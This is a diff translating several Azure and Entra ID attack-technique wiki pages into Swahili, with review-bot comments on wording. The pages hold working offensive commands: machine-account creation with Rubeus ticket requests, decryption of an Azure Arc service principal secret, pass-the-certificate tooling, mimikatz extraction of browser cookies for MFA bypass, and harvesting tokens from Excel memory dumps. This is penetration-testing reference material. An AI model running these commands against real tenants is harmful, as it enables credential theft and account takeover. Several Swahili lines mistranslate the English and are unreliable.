Kuna njia kadhaa za kupata akaunti ya mashine ndani ya mazingira ya AD. Moja ya njia maarufu ni kutumia quota ya akaunti ya mashine. Njia nyingine inahusisha kuathiri akaunti ya mashine kupitia ACLs dhaifu au mipangilio mingine mbalimbali isiyo sahihi.
|
||||
```powershell
|
||||
Import-MKodule powermad
|
||||
New-MachineAccount -MachineAccount fake01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
|
||||
```
|
||||
|
||||
Once a machine account is obtained, it is possible to authenticate using this account. We can either use the runas.exe command with the netonly flag or use pass-the-ticket with Rubeus.exe.
|
||||
|
||||
Mara tu akaunti ya mashine imepatikana, inawezekana kuthibitisha kwa kutumia akaunti hii. Tunaweza ama kutumia amri ya runas.exe na bendera ya netonly au kutumia pass-the-ticket na Rubeus.exe.
|
||||
```powershell
|
||||
runas /user:fake01$ /netonly powershell
|
||||
```
|
||||
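Review bot: the unchanged context line `Import-MKodule powermad` is a typo for `Import-Module powermad`; since this commit already touches the lines around that block, it is the right moment to fix it, otherwise anyone copying the snippet gets a CommandNotFound error before `New-MachineAccount` runs. On the translation side, `bendera ya netonly` renders "flag" with the word for a cloth flag; `kigezo cha netonly` or `/netonly` in backticks matches how the command is shown.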
@@ -48,9 +43,7 @@ runas /user:fake01$ /netonly powershell
|
||||
```powershell
|
||||
.\Rubeus.exe asktgt /user:fake01$ /password:123456 /prr
|
||||
```
|
||||
|
||||
By having the TGT for our computer account stored in memory, we can use the following script to decrypt the service principal secret.
|
||||
|
||||
Kwa kuwa na TGT ya akaunti yetu ya kompyuta iliyohifadhiwa kwenye kumbukumbu, tunaweza kutumia skripti ifuatayo kufungua siri ya huduma ya msingi.
|
||||
```powershell
|
||||
Import-Module .\AzureArcDeployment.psm1
|
||||
|
||||
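Review bot: `kufungua siri ya huduma ya msingi` translates "service principal" as `huduma ya msingi` ("basic service"), which loses the identity concept; "service principal" is an Entra ID term and should stay untranslated (`siri ya service principal`), consistent with how the other files in this commit keep `Access Tokens`, `PRT` and `TPM`. The same rendering appears in the final paragraph of the next hunk (`huduma ya msingi iliyovunjika`).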
@@ -59,17 +52,12 @@ $encryptedSecret = Get-Content "[shared folder path]\AzureArcDeploy\encryptedSer
|
||||
$ebs = [DpapiNgUtil]::UnprotectBase64($encryptedSecret)
|
||||
$ebs
|
||||
```
|
||||
Alternately, we can use [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG).
|
||||
|
||||
Alternatively, we can use [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG).
|
||||
|
||||
At this point, we can gather the remaining information needed to connect to Azure from the ArcInfo.json file, which is stored on the same network share as the encryptedServicePrincipalSecret file. This file contains details such as: TenantId, servicePrincipalClientId, ResourceGroup, and more. With this information, we can use Azure CLI to authenticate as the compromised service principal.
|
||||
Katika hatua hii, tunaweza kukusanya taarifa zilizobaki zinazohitajika kuungana na Azure kutoka kwa faili la ArcInfo.json, ambalo limehifadhiwa kwenye sehemu ile ile ya mtandao kama faili la encryptedServicePrincipalSecret. Faili hii ina maelezo kama: TenantId, servicePrincipalClientId, ResourceGroup, na mengineyo. Pamoja na taarifa hizi, tunaweza kutumia Azure CLI kuthibitisha kama huduma ya msingi iliyovunjika.
|
||||
|
||||
## References
|
||||
|
||||
- [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
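Review bot: `kuthibitisha kama huduma ya msingi iliyovunjika` reads as "authenticate as the broken basic service"; "compromised" is `iliyoathiriwa`, and keeping the term gives `kuthibitisha kama service principal iliyoathiriwa`. The `Alternately` to `Alternatively` correction on the English line is right; note that it lands in a file otherwise being translated, so it is worth a mention in the commit message.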
@@ -2,42 +2,38 @@
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Local Token Storage and Security Considerations
|
||||
## Hifadhi ya Token za Mitaa na Mambo ya Usalama
|
||||
|
||||
### Azure CLI (Command-Line Interface)
|
||||
### Azure CLI (Interface ya Amri)
|
||||
|
||||
Tokens and sensitive data are stored locally by Azure CLI, raising security concerns:
|
||||
Token na data nyeti huhifadhiwa kwa ndani na Azure CLI, na kuleta wasiwasi wa usalama:
|
||||
|
||||
1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\<username>\.Azure`.
|
||||
2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details.
|
||||
3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as:
|
||||
- Executed commands with credentials embedded.
|
||||
- URLs accessed using tokens, potentially revealing sensitive information.
|
||||
1. **Access Tokens**: Huhifadhiwa katika maandiko wazi ndani ya `accessTokens.json` iliyoko `C:\Users\<username>\.Azure`.
|
||||
2. **Taarifa za Usajili**: `azureProfile.json`, katika saraka hiyo hiyo, ina maelezo ya usajili.
|
||||
3. **Faili za Kumbukumbu**: Folda ya `ErrorRecords` ndani ya `.azure` inaweza kuwa na kumbukumbu zenye akreditivu zilizofichuliwa, kama vile:
|
||||
- Amri zilizotekelezwa zikiwa na akreditivu zilizojumuishwa.
|
||||
- URLs zilizofikiwa kwa kutumia token, ambazo zinaweza kufichua taarifa nyeti.
|
||||
|
||||
### Azure PowerShell
|
||||
|
||||
Azure PowerShell also stores tokens and sensitive data, which can be accessed locally:
|
||||
Azure PowerShell pia huhifadhi token na data nyeti, ambazo zinaweza kufikiwa kwa ndani:
|
||||
|
||||
1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\<username>\.Azure`, stores access tokens in plaintext.
|
||||
2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`.
|
||||
3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access.
|
||||
1. **Access Tokens**: `TokenCache.dat`, iliyoko `C:\Users\<username>\.Azure`, huhifadhi token za ufikiaji katika maandiko wazi.
|
||||
2. **Siri za Huduma Kuu**: Hizi huhifadhiwa bila usimbaji katika `AzureRmContext.json`.
|
||||
3. **Kipengele cha Kuhifadhi Token**: Watumiaji wana uwezo wa kudumisha token kwa kutumia amri ya `Save-AzContext`, ambayo inapaswa kutumika kwa tahadhari ili kuzuia ufikiaji usioidhinishwa.
|
||||
|
||||
## Automatic Tools to find them
|
||||
## Zana za Otomatiki za Kuziokoa
|
||||
|
||||
- [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe)
|
||||
- [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1)
|
||||
|
||||
## Security Recommendations
|
||||
## Mapendekezo ya Usalama
|
||||
|
||||
Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by:
|
||||
Kuzingatia uhifadhi wa data nyeti katika maandiko wazi, ni muhimu kulinda faili na saraka hizi kwa:
|
||||
|
||||
- Limiting access rights to these files.
|
||||
- Regularly monitoring and auditing these directories for unauthorized access or unexpected changes.
|
||||
- Employing encryption for sensitive files where possible.
|
||||
- Educating users about the risks and best practices for handling such sensitive information.
|
||||
- Kuweka mipaka ya haki za ufikiaji kwa faili hizi.
|
||||
- Kufuata na kukagua mara kwa mara saraka hizi kwa ufikiaji usioidhinishwa au mabadiliko yasiyotarajiwa.
|
||||
- Kutumia usimbaji kwa faili nyeti inapowezekana.
|
||||
- Kuwaelimisha watumiaji kuhusu hatari na mbinu bora za kushughulikia taarifa nyeti kama hizi.
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
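Review bot: the heading `## Zana za Otomatiki za Kuziokoa` means "automatic tools to rescue them"; "to find them" is `Kuzipata` (`## Zana za Otomatiki za Kuzipata`). `### Azure CLI (Interface ya Amri)` drops "Command-Line"; `Kiolesura cha Mstari wa Amri`, or simply keeping the English parenthetical, is clearer. The two lists mix conventions: item 1 keeps `**Access Tokens**` in English while items 2 and 3 translate their labels (`**Taarifa za Usajili**`, `**Siri za Huduma Kuu**`); pick one, and note that `Huduma Kuu` for "Service Principal" differs again from `huduma ya msingi` in the Azure Arc file of this same commit.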
@@ -4,40 +4,32 @@
|
||||
|
||||
## Pass the Certificate (Azure)
|
||||
|
||||
In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism.
|
||||
Katika mashine zilizounganishwa na Azure, inawezekana kuthibitisha kutoka mashine moja hadi nyingine kwa kutumia vyeti ambavyo **vinapaswa kutolewa na Azure AD CA** kwa mtumiaji anayehitajika (kama somo) wakati mashine zote zinasaidia **NegoEx** utaratibu wa uthibitishaji.
|
||||
|
||||
In super simplified terms:
|
||||
Kwa maneno rahisi sana:
|
||||
|
||||
- The machine (client) initiating the connection **needs a certificate from Azure AD for a user**.
|
||||
- Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD**
|
||||
- Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**.
|
||||
- Mashine (mteja) inayozindua muunganisho **inahitaji cheti kutoka Azure AD kwa mtumiaji**.
|
||||
- Mteja anaunda kichwa cha JSON Web Token (JWT) kinachojumuisha PRT na maelezo mengine, kinatia saini kwa kutumia Funguo iliyotokana (kwa kutumia funguo ya kikao na muktadha wa usalama) na **kinituma kwa Azure AD**
|
||||
- Azure AD inathibitisha saini ya JWT kwa kutumia funguo ya kikao cha mteja na muktadha wa usalama, inakagua uhalali wa PRT na **inajibu** kwa **cheti**.
|
||||
|
||||
In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack:
|
||||
Katika hali hii na baada ya kupata taarifa zote zinazohitajika kwa [**Pass the PRT**](pass-the-prt.md) shambulio:
|
||||
|
||||
- Username
|
||||
- Tenant ID
|
||||
- Jina la mtumiaji
|
||||
- Kitambulisho cha mpangilio
|
||||
- PRT
|
||||
- Security context
|
||||
- Derived Key
|
||||
|
||||
It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:**
|
||||
- Muktadha wa usalama
|
||||
- Funguo iliyotokana
|
||||
|
||||
Inawezekana **kuomba cheti cha P2P** kwa mtumiaji kwa kutumia chombo [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:**
|
||||
```bash
|
||||
RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE]
|
||||
```
|
||||
|
||||
The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user.
|
||||
|
||||
Vithibitisho vitadumu sawa na PRT. Kutumia vithibitisho unaweza kutumia chombo cha python [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) ambacho kitafanya **uthibitishaji** kwenye mashine ya mbali, kukimbia **PSEXEC** na **kufungua CMD** kwenye mashine ya mwathirika. Hii itaturuhusu kutumia Mimikatz tena kupata PRT ya mtumiaji mwingine.
|
||||
```bash
|
||||
Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
- For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
|
||||
- Kwa maelezo zaidi kuhusu jinsi Pass the Certificate inavyofanya kazi angalia chapisho asilia [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
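Review bot: the translated parameter list ("Kitambulisho cha mpangilio", "Muktadha wa usalama", "Funguo iliyotokana") no longer maps onto the flag names in the `RequestCert.py` usage line kept below it (`--tenantId`, `--hexCtx`, `--hexDerivedKey`), and "mpangilio" reads as "setting/arrangement" rather than tenant; keep the English term beside each translation, e.g. `- Kitambulisho cha mpangilio (Tenant ID)`, `- Muktadha wa usalama (Security context)`, `- Funguo iliyotokana (Derived Key)`, so the reader can match each value to its flag. Two smaller points: "kwa [**Pass the PRT**](pass-the-prt.md) shambulio" should be "shambulio la [**Pass the PRT**](pass-the-prt.md)", and "certificate" is "cheti" in the earlier bullets but "Vithibitisho" (credentials) in the AzureADJoinedMachinePTC paragraph; use "Vyeti" there ("Vyeti vitadumu muda sawa na PRT").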
@@ -2,40 +2,34 @@
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Why Cookies?
|
||||
## Kwa Nini Cookies?
|
||||
|
||||
Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate.
|
||||
Browser **cookies** ni mekanizma nzuri ya **kupita uthibitishaji na MFA**. Kwa sababu mtumiaji tayari amejiandikisha katika programu, **cookie** ya kikao inaweza kutumika tu **kupata data** kama mtumiaji huyo, bila kuhitaji kujiandikisha tena.
|
||||
|
||||
You can see where are **browser cookies located** in:
|
||||
Unaweza kuona ambapo **cookies za kivinjari ziko** katika:
|
||||
|
||||
{{#ref}}
|
||||
https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome
|
||||
{{#endref}}
|
||||
|
||||
## Attack
|
||||
## Shambulio
|
||||
|
||||
The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in:
|
||||
Sehemu ngumu ni kwamba **cookies hizo zimefungwa** kwa **mtumiaji** kupitia Microsoft Data Protection API (**DPAPI**). Hii imefungwa kwa kutumia [funguo za kificho zinazohusishwa na mtumiaji](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) ambao cookies zinahusiana nazo. Unaweza kupata maelezo zaidi kuhusu hii katika:
|
||||
|
||||
{{#ref}}
|
||||
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords
|
||||
{{#endref}}
|
||||
|
||||
With Mimikatz in hand, I am able to **extract a user’s cookies** even though they are encrypted with this command:
|
||||
|
||||
Kwa Mimikatz mkononi, naweza **kutoa cookies za mtumiaji** hata ingawa zimefungwa kwa amri hii:
|
||||
```bash
|
||||
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
|
||||
```
|
||||
Kwa Azure, tunajali kuhusu kuki za uthibitishaji ikiwemo **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, na **`ESTSAUTHLIGHT`**. Hizi zipo kwa sababu mtumiaji amekuwa hai kwenye Azure hivi karibuni.
|
||||
|
||||
For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately.
|
||||
Tu naviga kwenye login.microsoftonline.com na ongeza kuki **`ESTSAUTHPERSISTENT`** (iliyoundwa na chaguo la “Stay Signed In”) au **`ESTSAUTH`**. Na utathibitishwa.
|
||||
|
||||
Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated.
|
||||
|
||||
## References
|
||||
## Marejeleo
|
||||
|
||||
- [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
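Review bot: "amejiandikisha" in the "Kwa Nini Cookies?" paragraph means "has registered/enrolled", not "has authenticated"; the point of the section is that the session cookie stands in for an authentication the user already completed, so use "amethibitishwa" and "bila kuhitaji kuthibitishwa tena". Terminology is also mixed within the file: "cookies" in the first two paragraphs, "kuki" in the ESTSAUTH paragraph; pick one. "Tu naviga kwenye" is a calque; "Nenda tu kwenye login.microsoftonline.com" is the idiomatic form. Finally, "## References" becomes "## Marejeleo" here but is left as "## References" in the pass-the-certificate file of this same commit; the two files should agree.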
@@ -2,10 +2,6 @@
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
|
||||
**Angalia:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -2,10 +2,6 @@
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30)
|
||||
**Angalia chapisho katika** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) ingawa chapisho lingine linalofafanua sawa linaweza kupatikana katika [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
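Review bot: "linalofafanua sawa" is unclear, since "sawa" on its own reads as "fine/equal"; "chapisho lingine linalofafanua jambo hilo hilo" says "explaining the same thing" as the English line does.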
@@ -4,14 +4,13 @@
|
||||
|
||||
## **Basic Information**
|
||||
|
||||
As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA.
|
||||
Kama ilivyoelezwa katika [**hii video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), baadhi ya programu za Microsoft zinazohusishwa na wingu (Excel, Teams...) zinaweza **kuhifadhi alama za ufikiaji katika maandiko wazi kwenye kumbukumbu**. Hivyo basi, **kudondosha** **kumbukumbu** ya mchakato na **kuangalia kwa alama za JWT** kunaweza kukupa ufikiaji wa rasilimali kadhaa za mwathirika katika wingu bila kupita MFA.
|
||||
|
||||
Steps:
|
||||
|
||||
1. Dump the excel processes synchronized with in EntraID user with your favourite tool.
|
||||
2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output
|
||||
3. Find the tokens that interest you the most and run tools over them:
|
||||
Hatua:
|
||||
|
||||
1. Dondosha mchakato wa excel uliohusishwa na mtumiaji wa EntraID kwa kutumia chombo chako unachokipenda.
|
||||
2. Endesha: `string excel.dmp | grep 'eyJ0'` na pata alama kadhaa katika matokeo
|
||||
3. Pata alama ambazo zinakuvutia zaidi na endesha zana juu yao:
|
||||
```bash
|
||||
# Check the identity of the token
|
||||
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq
|
||||
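Review bot: step 2 carries a command typo over from the English: `string excel.dmp | grep 'eyJ0'` should be `strings excel.dmp | grep 'eyJ0'` (`strings` is the tool that extracts printable text from a dump; there is no `string` command), and since the line is being rewritten anyway the Swahili version should not preserve the error. Two wording points: "Dondosha mchakato wa excel" means "drop the process" where the intent is a memory dump, so "Toa dump ya kumbukumbu ya mchakato wa Excel" is clearer; and "bila kupita MFA" reads as "without going through MFA" where the English says bypassing, so "huku ukikwepa MFA" keeps the meaning.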
@@ -31,11 +30,6 @@ curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sit
|
||||
┌──(magichk㉿black-pearl)-[~]
|
||||
└─$ curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'
|
||||
```
|
||||
|
||||
**Note that these kind of access tokens can be also found inside other processes.**
|
||||
**Kumbuka kwamba aina hizi za access tokens zinaweza pia kupatikana ndani ya michakato mingine.**
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
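Review bot: "access tokens" is kept in English in this hunk but rendered "alama za ufikiaji" in the first hunk of the same file; use one term throughout. Keeping the English term (optionally with "tokeni") is the safer choice, since it is what readers will match against the `Authorization: Bearer` header in the unchanged curl lines above.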
@@ -2,10 +2,6 @@
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**.
|
||||
Ili kuanza majaribio unapaswa kuwa na ufikiaji na mtumiaji mwenye **idhini za Msomaji juu ya usajili** na **nafasi ya Msomaji wa Kimataifa katika AzureAD**. Ikiwa hata katika hali hiyo huwezi **kufikia maudhui ya Akaunti za Hifadhi** unaweza kurekebisha hilo kwa **nafasi ya Mchangiaji wa Akaunti ya Hifadhi**.
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
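Review bot: "Msomaji wa Kimataifa" ("International Reader") does not identify the role the English names; Reader, Global Reader and Storage Account Contributor are Azure/Entra role names that readers need to look up or assign as-is, so keep them in English, e.g. "mtumiaji mwenye nafasi ya **Reader** juu ya usajili na **Global Reader** katika AzureAD" and "kwa nafasi ya **Storage Account Contributor**". The line already keeps "AzureAD" untranslated, so this is consistent with its own convention.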